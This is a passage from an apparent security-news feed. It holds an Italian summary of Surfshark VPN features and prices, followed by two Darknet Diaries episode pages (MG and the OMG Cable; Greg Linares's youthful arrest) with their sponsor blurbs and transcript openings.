seguenti caratteristiche principali: Connessioni illimitate: Unico abbonamento su un numero illimitato di dispositivi. Garanzia di rimborso: offre una garanzia di rimborso entro 30 giorni. Server: dispone di oltre 3.200 server in 100 paesi. Politica no-log: garantisce di non monitorare, tracciare o archiviare le attività online. Funzionalità di sicurezza: include funzionalità come il Kill Switch (che interrompe la connessione internet in caso di caduta della VPN), CleanWeb (che blocca annunci, tracker e malware), Bypasser (split tunneling per escludere app dalla VPN), e Dynamic MultiHop (per instradare il traffico su due server). Sicurezza: utilizza la crittografia AES-256 e supporta protocolli come WireGuard, IKEv2 e OpenVPN. Prova gratuita: offre una prova gratuita di 7 giorni su alcuni dispositivi e, in generale, la possibilità di usufruire di una prova di 30 giorni grazie alla garanzia di rimborso. Pacchetti: oltre alla VPN, propone pacchetti “Surfshark One” o “Surfshark One+” che includono funzionalità aggiuntive come Antivirus, Alternative ID, Alert e Incogni (per la rimozione dei dati personali). Inoltre, ci sono diverse offerte promozionali e sconti disponibili, in particolare per gli abbonamenti a lungo termine (ad es. 24 mesi). Questo è il piano più basilare e meno costoso di Surfshark. È ideale per chi cerca una soluzione VPN affidabile per la protezione essenziale della navigazione, senza funzionalità aggiuntive. Prezzi: - 24 mesi (+3 extra): Il prezzo più conveniente a lungo termine, con un costo mensile di 1,99 € e un pagamento totale di 53,73 € per 27 mesi. - 12 mesi (+3 extra): Un’opzione di medio termine con un costo mensile di 3,19 € e un pagamento totale di 47,85 € per 15 mesi. - 1 mese: Il piano più flessibile ma anche il più costoso, a 15,45 € al mese. Questo piano è un’opzione intermedia che include tutte le funzionalità del piano Starter e aggiunge ulteriori strumenti per una sicurezza più robusta. È il piano più popolare, probabilmente per l’equilibrio tra costo e benefici aggiuntivi. Funzionalità aggiuntive: - Mascheramento email e documenti di identità: Funzionalità per proteggere ulteriormente i tuoi dati personali. - Rimozione dei dati personali dal web: Strumenti per aiutarti a rimuovere le tue informazioni personali da database online, migliorando la tua privacy. Prezzi: - 24 mesi (+3 extra): 2,49 € al mese, per un totale di 67,23 € per 27 mesi. - 12 mesi (+3 extra): 3,39 € al mese, per un totale di 50,85 € per 15 mesi. - 1 mese: 17,95 € al mese. Questo è il piano più completo e costoso, progettato per chi desidera la massima protezione e tutti i servizi offerti da Surfshark. Include tutte le funzionalità dei piani Starter e One, con l’aggiunta di strumenti avanzati per la rimozione dei dati personali. Funzionalità aggiuntive: Include tutte le funzionalità dei piani precedenti, con un focus avanzato sulla rimozione dei dati personali dal web, probabilmente con un servizio più proattivo o automatizzato. Prezzi: - 24 mesi (+3 extra): 3,99 € al mese, per un totale di 107,73 € per 27 mesi. - 12 mesi (+3 extra): 6,09 € al mese, per un totale di 91,35 € per 15 mesi. - 1 mese: 20,65 € al mese. Le VPN gratuite possono sembrare una soluzione conveniente per accedere a contenuti geo-bloccati, ma presentano diverse limitazioni. Innanzitutto, molte di esse impongono un limite di dati mensili o una velocità ridotta che rende difficile lo streaming continuo. In secondo luogo, raramente riescono a sbloccare piattaforme come Netflix o Disney+, poiché utilizzano IP condivisi facilmente individuabili. Ancora più preoccupante è il tema della sicurezza: alcuni servizi gratuiti monetizzano i dati degli utenti, esponendoli a rischi di tracciamento o pubblicità invasiva. Al contrario, le VPN a pagamento offrono connessioni rapide, larghezza di banda illimitata, una maggiore capacità di aggirare i blocchi, assistenza tecnica 24/7 e una politica trasparente sulla gestione dei dati personali. Per chi fa dello streaming un uso regolare, investire in una VPN premium è una scelta che ripaga in termini di qualità, affidabilità e tranquillità.
cybersecurity360.itAug 5, 2025extracted
161: mg
In this episode we talk with MG (https://x.com/MG), the brilliant (and notorious) hacker and hardware engineer behind the OMG Cable. A seemingly ordinary USB cable with extraordinary offensive capabilities. Learn more about MG at: O.MG.LOL Sponsors Support for this show comes from ThreatLocker®. ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at www.threatlocker.com. Support for this show comes from Axonius. Axonius transforms asset intelligence into intelligent action. With the Axonius Asset Cloud, customers preemptively tackle high-risk and hard-to-spot threat exposures, misconfigurations, and overspending. The integrated platform brings together data from every system in an organization’s IT infrastructure to optimize mission-critical risk, performance, and cost measures via actionable intelligence. Covering cyber assets, software, SaaS applications, identities, vulnerabilities, infrastructure, and more, Axonius is the one place to go for Security, IT, and GRC teams to continuously drive actionability across the organization. Bring truth to action with Axonius. Learn more at axonius.com. Attribution Darknet Diaries is created by Jack Rhysider. Assembled by Tristan Ledger. Episode artwork by odibagas. Mixing by Proximity Sound. Theme music created by Breakmaster Cylinder. Theme song available for listen and download at bandcamp. Or listen to it on Spotify. Transcript [START OF RECORDING] JACK: Hey, hey, it’s Jack, host of the show. I am feeling good. I am feeling healthy, strong, fit. I’m in the game. So, I’m coming at you with a second episode this month. Let’s go! Defcon is coming up in a few weeks. I’ll be there. I wouldn’t miss it. You know me. If you don’t know, it’s the premiere hacking conference in Vegas, and I love going because every year something crazy happens. You don’t always know what it’ll be, but you know something is going down somewhere. Like, maybe someone will drop a zero-day live on stage, which will suddenly make us all panic and call home; shut everything down! Or maybe the FBI breaks into someone’s hotel room and arrests someone who they’ve been chasing for a decade. Or maybe someone gives a talk that makes history.
darknetdiaries.comJul 15, 2025extracted
160: Greg
Greg Linares (AKA Laughing Mantis) joins us to tell us about how he became the youngest hacker to be arrested in Arizona. Follow Greg on Twitter: https://x.com/Laughing_Mantis. Sponsors Support for this show comes from ThreatLocker®. ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at www.threatlocker.com. This show is sponsored by Red Canary. Red Canary is a leading provider of Managed Detection and Response (MDR), helping nearly 1,000 organizations detect and stop threats before they cause harm. With a focus on accuracy across identities, endpoints, and cloud, we deliver trusted security operations and a world-class customer experience. Learn more at redcanary.com. This show is sponsored by Miro. AI doesn’t have to be intimidating—in fact, it can help your team thrive. Miro’s Innovation Workspace changes that by bringing people and AI together to turn ideas into impact, fast. Whether you’re launching a new podcast, streamlining a process, or building the next big thing, Miro helps your team move quicker, collaborate better, and actually enjoy the work. Learn more at https://miro.com/. Attribution Darknet Diaries is created by Jack Rhysider. Assembled by Tristan Ledger. Episode artwork by odibagas. Mixing by Proximity Sound. Theme music created by Breakmaster Cylinder. Theme song available for listen and download at bandcamp. Or listen to it on Spotify. Transcript [START OF RECORDING] JACK: [App beeping] Hey. DAD: Man, I don’t see you. JACK: Yeah, my tape is usually over my camera. DAD: Why don’t I see you? JACK: I got my tape on my camera. One second. DAD: Ah. I can’t even hear you. JACK: You can’t hear me? DAD: My sound… JACK: [Background talk] There’s a story I had that I totally forgot about but I remembered recently, and I wanted to call up my dad and walk through it again with him to try to remember how it went.
darknetdiaries.comJul 1, 2025extracted